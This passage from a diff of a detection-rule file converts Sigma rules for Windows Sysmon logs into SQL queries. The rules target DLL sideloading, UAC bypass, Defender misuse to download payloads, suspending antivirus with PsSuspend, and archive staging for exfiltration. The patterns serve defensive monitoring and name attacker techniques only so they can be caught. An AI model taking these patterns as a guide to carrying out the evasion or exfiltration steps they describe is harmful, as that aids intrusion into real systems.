LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE 
'\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND Image LIKE '%\\\\wldp.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR ((Image LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR OriginalFileName = 'sqlps.exe') AND NOT (ParentImage LIKE 
'%\\\\sqlagent.exe' ESCAPE '\\'))))" ], - "filename": "image_load_side_load_from_non_system_location.yml" + "filename": "proc_creation_win_mssql_sqlps_susp_execution.yml" }, { - "title": "PCRE.NET Package Image Load", - "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "title": "Windows Defender Download Activity", + "id": "46123129-1024-423e-9fae-43af4a0fa9a5", "status": "test", - "description": "Detects processes loading modules related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detect the use of Windows Defender to download payloads", + "author": "Matthew Matchen", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" ], - "filename": "image_load_pcre_net_load.yml" + "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" }, { - "title": "Malicious DLL Load By Compromised 3CXDesktopApp", - "id": "d0b65ad3-e945-435e-a7a9-438e62dd48e9", + "title": "Suspicious Ping/Del Command Combination", + "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", "status": "experimental", - "description": "Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a method often used by ransomware. 
Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", + "author": "Ilya Krestinichev", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429%' ESCAPE '\\' OR Hashes LIKE '%MD5=74BC2D0B6680FAA1A5A76B27E5479CBC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E%' ESCAPE '\\' OR Hashes LIKE '%MD5=82187AD3F0C6C225E2FBA0C867280CC9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952%' ESCAPE '\\' OR Hashes LIKE '%SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30%' ESCAPE '\\' OR Hashes LIKE '%MD5=11BC82A9BD8297BD0823BCE5D6202082%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B3E778B647371262120A523EB873C20BB82BEAF%' ESCAPE '\\' OR Hashes LIKE '%MD5=7FAEA2B01796B80D180399040BB69835%' ESCAPE '\\') OR sha256 IN ('7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896', '11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03', 'F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952', '8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423') OR sha1 IN ('BF939C9C261D27EE7BB92325CC588624FCA75429', '20D554A80D759C50D6537DD7097FED84DD258B3E', '894E7D4FFD764BB458809C7F0643694B036EAD30', '3B3E778B647371262120A523EB873C20BB82BEAF') OR md5 IN 
('74BC2D0B6680FAA1A5A76B27E5479CBC', '82187AD3F0C6C225E2FBA0C867280CC9', '11BC82A9BD8297BD0823BCE5D6202082', '7FAEA2B01796B80D180399040BB69835')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" ], - "filename": "image_load_malware_3cx_compromise_susp_dll.yml" + "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" }, { - "title": "UAC Bypass Using Iscsicpl - ImageLoad", - "id": "9ed5959a-c43c-4c59-84e3-d28628429456", + "title": "Sysinternals PsSuspend Suspicious Execution", + "id": "4beb6ae0-f85b-41e2-8f18-8668abc8af78", "status": "experimental", - "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "description": "Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = 
'1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'pssuspend.exe' OR (Image LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend64.exe' ESCAPE '\\')) AND CommandLine LIKE '%msmpeng.exe%' ESCAPE '\\')" ], - "filename": "image_load_uac_bypass_iscsicpl.yml" + "filename": "proc_creation_win_sysinternals_pssuspend_susp_execution.yml" }, { - "title": "DotNet CLR DLL Loaded By Scripting Applications", - "id": "4508a70e-97ef-4300-b62b-ff27992990ea", + "title": "Compress Data and Lock With Password for Exfiltration With WINZIP", + "id": "e2e80da2-8c66-4e00-ae3c-2eebd29f6b6d", "status": "test", - "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", - "author": "omkar72, oscd.community", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "author": "frack113", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1055" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%winzip.exe%' ESCAPE '\\' OR CommandLine LIKE '%winzip64.exe%' ESCAPE '\\') AND CommandLine LIKE '%-s\"%' 
ESCAPE '\\' AND (CommandLine LIKE '% -min %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" ], - "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_winzip_password_compression.yml" }, { - "title": "Potential Wazuh Security Platform DLL Sideloading", - "id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", + "title": "Parent in Public Folder Suspicious Process", + "id": "69bd9b97-2be2-41b6-9816-fb08757a4d1a", "status": "experimental", - "description": "Detects potential DLL sideloading of DLLs that are part of the Wazuh security platform", - "author": "X__Junior", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], + "description": "This rule detects suspicious processes with parent images located in the C:\\Users\\Public folder", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\libwazuhshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libwinpthread-1.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\ossec-agent\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Inkscape\\\\bin\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Pidgin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE 
'%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_wazuh.yml" + "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" }, { - "title": "APT PRIVATELOG Image Load Pattern", - "id": "33a2d1dd-f3b0-40bd-8baf-7974468927cc", + "title": "WebDav Client Execution", + "id": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", "status": "test", - "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Rarely observed" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\clfsw32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\')" ], - "filename": "image_load_usp_svchost_clfsw32.yml" + "filename": "proc_creation_win_rundll32_webdav_client_execution.yml" }, { - "title": "Abusing Azure Browser SSO", - "id": "50f852e6-af22-4c78-9ede-42ef36aa3453", - "status": "test", - "description": 
"Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", - "author": "Den Iuzvyk", + "title": "Suspicious Svchost Process", + "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", + "status": "experimental", + "description": "Detects a suspicious svchost process start", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.002" + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%MicrosoftAccountTokenProvider.dll' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\BackgroundTaskHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\devenv.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR Image LIKE '%\\\\OneDrive.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image = ''))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR 
(ParentImage = '') OR (ParentImage = '') OR (ParentImage = '-')))" ], - "filename": "image_load_abusing_azure_browser_sso.yml" + "filename": "proc_creation_win_svchost_susp_parent_process.yml" }, { - "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", - "id": "75e508f7-932d-4ebc-af77-269237a84ce1", - "status": "experimental", - "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious aspnet_compiler.exe Execution", + "id": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", + "status": "test", + "description": "Execute C# code with the Build Provider and proper folder structure in place.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.003" + "attack.t1127" ], "falsepositives": [ - "Unikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%aspnet\\_compiler.exe%' ESCAPE '\\')" ], - "filename": "image_load_cmstp_load_dll_from_susp_location.yml" + "filename": "proc_creation_win_lolbin_aspnet_compiler.yml" }, { - "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", - "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", - "status": "experimental", - "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities 
exploiting msdt.exe binary to load the \"sdiageng.dll\" library", - "author": "Greg (rule)", + "title": "Zip A Folder With PowerShell For Staging In Temp", + "id": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", + "status": "test", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1202", - "cve.2022.30190" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Compress-Archive %' ESCAPE '\\' AND CommandLine LIKE '% -Path %' ESCAPE '\\' AND CommandLine LIKE '% -DestinationPath %' ESCAPE '\\' AND CommandLine LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - 